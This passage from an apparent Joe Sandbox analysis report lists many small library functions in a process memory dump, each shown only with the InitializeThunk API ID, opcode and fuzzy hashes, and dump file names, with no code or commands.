                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: dcc3a6211633955e45183153744fbb28bbac6a73d69ed7ed7d35dabb39382c0b
                                                                                                                                    • Instruction ID: bd9742e2fc67e34adbc1c1a2e83220dc8db4b834a0628383fe84bfaae087893a
                                                                                                                                    • Opcode Fuzzy Hash: dcc3a6211633955e45183153744fbb28bbac6a73d69ed7ed7d35dabb39382c0b
                                                                                                                                    • Instruction Fuzzy Hash: B7900435705C1413D140F15C4DC45474015D7F5301F55D011F0435554CCF14CF575371
                                                                                                                                    Function 031C4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: b4af7eca0c666d611a6dcfe508d32024548c4d5a301d02c098c5ff1db88a1fa6
                                                                                                                                    • Instruction ID: 04b237cfa3507a65d258a47c407e09856e8bf1af0d5d54983d49b21d151b42a8
                                                                                                                                    • Opcode Fuzzy Hash: b4af7eca0c666d611a6dcfe508d32024548c4d5a301d02c098c5ff1db88a1fa6
                                                                                                                                    • Instruction Fuzzy Hash: 70900475701514434140F15C4D044077015D7F73013D5D115F0555570CC71CCD55D37D
                                                                                                                                    Function 031C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 2f55122a72468841df935fb8f0b05bf4fd632d9d298fd690158522ea54fa11e8
                                                                                                                                    • Instruction ID: 61522353d13da1e6a99ce40d057d10ec2f451ba5dd576122dd1d2c0ea0fa5d4d
                                                                                                                                    • Opcode Fuzzy Hash: 2f55122a72468841df935fb8f0b05bf4fd632d9d298fd690158522ea54fa11e8
                                                                                                                                    • Instruction Fuzzy Hash: 7F90023560551803D100B1584614706101587D5201F65D411A0425568D87958A5165A2
                                                                                                                                    Function 031C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 9c71cab96b2e0d59a912d9fd6261f6c1245e08e1dc2d77c3a99f7c1f0282983a
                                                                                                                                    • Instruction ID: e7a402bf1a4e7ac925da0f297bc96bae860b3c867bd0c0a6bd33e4d30c0f55ca
                                                                                                                                    • Opcode Fuzzy Hash: 9c71cab96b2e0d59a912d9fd6261f6c1245e08e1dc2d77c3a99f7c1f0282983a
                                                                                                                                    • Instruction Fuzzy Hash: FC900475303414034105F15C4514717401FC7F5301F55D031F10155D0DC735CDD17135
                                                                                                                                    Function 031C2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 07808b4ce79aa1e3f448c23b3d57448c26f39308c6906b7fc2f28fa4a1cd4b15
                                                                                                                                    • Instruction ID: 117540f6f40726095525a8b1b6b1330f66fd1adde0d577cdafd05aed1de6e98c
                                                                                                                                    • Opcode Fuzzy Hash: 07808b4ce79aa1e3f448c23b3d57448c26f39308c6906b7fc2f28fa4a1cd4b15
                                                                                                                                    • Instruction Fuzzy Hash: C990043570541C03D150F15C45147470015C7D5301F55D011F0035754DC755CF5577F1
                                                                                                                                    Function 031C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 95e49b31d5b640590416125a1addc19d7ca87b8f3b9eaae6fcd37f1764eef324
                                                                                                                                    • Instruction ID: c727284fb4da95a6c6fbc125544caa9cb5caf83feffa9220b40f30243aea4a9d
                                                                                                                                    • Opcode Fuzzy Hash: 95e49b31d5b640590416125a1addc19d7ca87b8f3b9eaae6fcd37f1764eef324
                                                                                                                                    • Instruction Fuzzy Hash: 2290023520141C03D180B158450464A001587D6301F95D015A0026654DCB158B5977A1
                                                                                                                                    Function 031C2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4b6f0c573f2bae13e96d048884a819c215010f2517f880c39ebf12776def0e93
                                                                                                                                    • Instruction ID: e7a4138c4e946f357f521cb666ad2012c87d0de22a9ba5047d80ce4c2b340273
                                                                                                                                    • Opcode Fuzzy Hash: 4b6f0c573f2bae13e96d048884a819c215010f2517f880c39ebf12776def0e93
                                                                                                                                    • Instruction Fuzzy Hash: F790023520545C43D140B1584504A46002587D5305F55D011A0065694D97258E55B661
                                                                                                                                    Function 031C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4a09c4a2a5d70ee0b5d16be39943252ccc7a3b1ad2eda8179e3fa1bb8ae1d151
                                                                                                                                    • Instruction ID: bd742ce567c8efabb31ee40d4d369214b0ea0b9c9bdf1fc8362080560cc32505
                                                                                                                                    • Opcode Fuzzy Hash: 4a09c4a2a5d70ee0b5d16be39943252ccc7a3b1ad2eda8179e3fa1bb8ae1d151
                                                                                                                                    • Instruction Fuzzy Hash: 7090043D311414030105F55C07045070057C7DF351355D031F1017550CD731CD715131
                                                                                                                                    Function 031C2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: cb2bbebd61552d2a1989f5ed05b9ac66488a427ec3f1afc8f32db070e62136a8
                                                                                                                                    • Instruction ID: 76b1d66953536119d70d75daaeb0a9b5d7d1018e43691128ee4f09ba2765e458
                                                                                                                                    • Opcode Fuzzy Hash: cb2bbebd61552d2a1989f5ed05b9ac66488a427ec3f1afc8f32db070e62136a8
                                                                                                                                    • Instruction Fuzzy Hash: 97900229221414030145F558070450B045597DB351395D015F1417590CC72189655321
                                                                                                                                    Function 031C39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 5b541049ccbd0a47ca45ad0fdf4666f785a14a3fbc7ebb9e9283b95309243c75
                                                                                                                                    • Instruction ID: c12df08b88b4abb3dca2afe1b994f48010b45b6c8f43fcf13981d57722a5b9ea
                                                                                                                                    • Opcode Fuzzy Hash: 5b541049ccbd0a47ca45ad0fdf4666f785a14a3fbc7ebb9e9283b95309243c75
                                                                                                                                    • Instruction Fuzzy Hash: BD90043534547503D150F15C45047174015F7F5301F55D031F0C155D4DC755CD557331
                                                                                                                                    Function 031C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 217adcf7055134956bc526a5a145c971c105b78ea17795600db5efec25fef065
                                                                                                                                    • Instruction ID: 9796a762a114b29f894d7ed4a52075e2fd65000e024be505c92636745570a48c
                                                                                                                                    • Opcode Fuzzy Hash: 217adcf7055134956bc526a5a145c971c105b78ea17795600db5efec25fef065
                                                                                                                                    • Instruction Fuzzy Hash: AB90026534141843D100B1584514B060015C7E6301F55D015E1065554D8719CD526126
                                                                                                                                    Function 031C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 3cdefb44b930a5786b3a915773a42cb43e689fa73bd34705924edb80db713024
                                                                                                                                    • Instruction ID: 2c319763b63f2107ed689a0be8ff83a925b6b9f39817f700f96ec79558563c10
                                                                                                                                    • Opcode Fuzzy Hash: 3cdefb44b930a5786b3a915773a42cb43e689fa73bd34705924edb80db713024
                                                                                                                                    • Instruction Fuzzy Hash: 68900225601414434140B16889449064015ABE6211755D121A0999550D875989655665
                                                                                                                                    Function 031C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 82d161b95e5491ac05363f137f908701a86721a2f6a8724de9e18cd6b8f3c182
                                                                                                                                    • Instruction ID: 562700bdc2a205fd09c3b5c502bc6f0409dde84d0856f88312acbe1e651e8bd9
                                                                                                                                    • Opcode Fuzzy Hash: 82d161b95e5491ac05363f137f908701a86721a2f6a8724de9e18cd6b8f3c182
                                                                                                                                    • Instruction Fuzzy Hash: DE900435311C1443D300F57C4D14F070015C7D5303F55D115F0155554CCF15CD715531
                                                                                                                                    Function 031C2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4d6c5dd4c80077ba82584c49b2a40c601df44e0a5c21f7db2cdc79a59f25768c
                                                                                                                                    • Instruction ID: 740afa6bc5a0151c36c31ce06c88fe15ffaaeddc9fbdbc6f3b5714c03b61076d
                                                                                                                                    • Opcode Fuzzy Hash: 4d6c5dd4c80077ba82584c49b2a40c601df44e0a5c21f7db2cdc79a59f25768c
                                                                                                                                    • Instruction Fuzzy Hash: E690022560141903D101B1584504616001A87D5241F95D022A1025555ECB258A92A131
                                                                                                                                    Function 031C2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: fd9787aeb50f1c6cd1cb070f66de66b2eb230f171fa2648d1c0d1b1b0cff2167
                                                                                                                                    • Instruction ID: 68abb48020e70b0014dbbe737f4704db2e03933022dc2b0b36ce8c9bf0580811
                                                                                                                                    • Opcode Fuzzy Hash: fd9787aeb50f1c6cd1cb070f66de66b2eb230f171fa2648d1c0d1b1b0cff2167
                                                                                                                                    • Instruction Fuzzy Hash: BB90026520181803D140B5584904607001587D5302F55D011A2065555E8B298D516135
                                                                                                                                    Function 031C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: f17b84cadf954b199115295c21f9537825861b6dfd3dede430916e0bb9d043ff
                                                                                                                                    • Instruction ID: f09c9ec13f506b0adc7e64161151fc7a218226227849b063991a95959854026c
                                                                                                                                    • Opcode Fuzzy Hash: f17b84cadf954b199115295c21f9537825861b6dfd3dede430916e0bb9d043ff
                                                                                                                                    • Instruction Fuzzy Hash: 0790022D21341403D180B158550860A001587D6202F95E415A0016558CCB1589695321
                                                                                                                                    Function 031C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 438172184bd3ad3c10ae75ba77614d58b3d7b584e390c3b580a5115d2859f052
                                                                                                                                    • Instruction ID: 203109d91fc86715d78560159fe612427898bfca8f536e08160403f12daaf18b
                                                                                                                                    • Opcode Fuzzy Hash: 438172184bd3ad3c10ae75ba77614d58b3d7b584e390c3b580a5115d2859f052
                                                                                                                                    • Instruction Fuzzy Hash: 1990043530141403D140F15C551C7074015D7F7301F55F011F0415554CDF15CD575333
                                                                                                                                    Function 031C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 1cc92cb9bc57352cb5c088cba84ed99237cccdb5fb218ccfbb88cf7120b0d3ed
                                                                                                                                    • Instruction ID: 49e420974175fc1343429e3e52a0bb26210e71db548384807be01f152207f0a9
                                                                                                                                    • Opcode Fuzzy Hash: 1cc92cb9bc57352cb5c088cba84ed99237cccdb5fb218ccfbb88cf7120b0d3ed
                                                                                                                                    • Instruction Fuzzy Hash: 71900435343455535545F15C45045074017D7F53417D5D013F1415D50CC737DD57D731
                                                                                                                                    Function 031C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 36c0e6c7a96ea7beab0eda5bed70c873fd0fb5a1f7c7de4d7483bc37061eb680
                                                                                                                                    • Instruction ID: c2f8f1d8c3814d25423f2e943ea542f9d5b0acfa8d80b9d677112ff6801f4cd8
                                                                                                                                    • Opcode Fuzzy Hash: 36c0e6c7a96ea7beab0eda5bed70c873fd0fb5a1f7c7de4d7483bc37061eb680
                                                                                                                                    • Instruction Fuzzy Hash: B090023520141813D111B1584604707001987D5241F95D412A0425558D97568A52A121
                                                                                                                                    Function 031C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 6fe5c10243e13eafd84843348a1f8a1f5bae3a9bb99c709f6fb555c0d6f81441
                                                                                                                                    • Instruction ID: 07f8a95c283da0b8d737bafef2cf44ae05f3a7a0e4808c99c333b0659d2190e4
                                                                                                                                    • Opcode Fuzzy Hash: 6fe5c10243e13eafd84843348a1f8a1f5bae3a9bb99c709f6fb555c0d6f81441
                                                                                                                                    • Instruction Fuzzy Hash: 7C90023520149C03D110B158850474A001587D5301F59D411A4425658D879589917121
                                                                                                                                    Function 031C2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
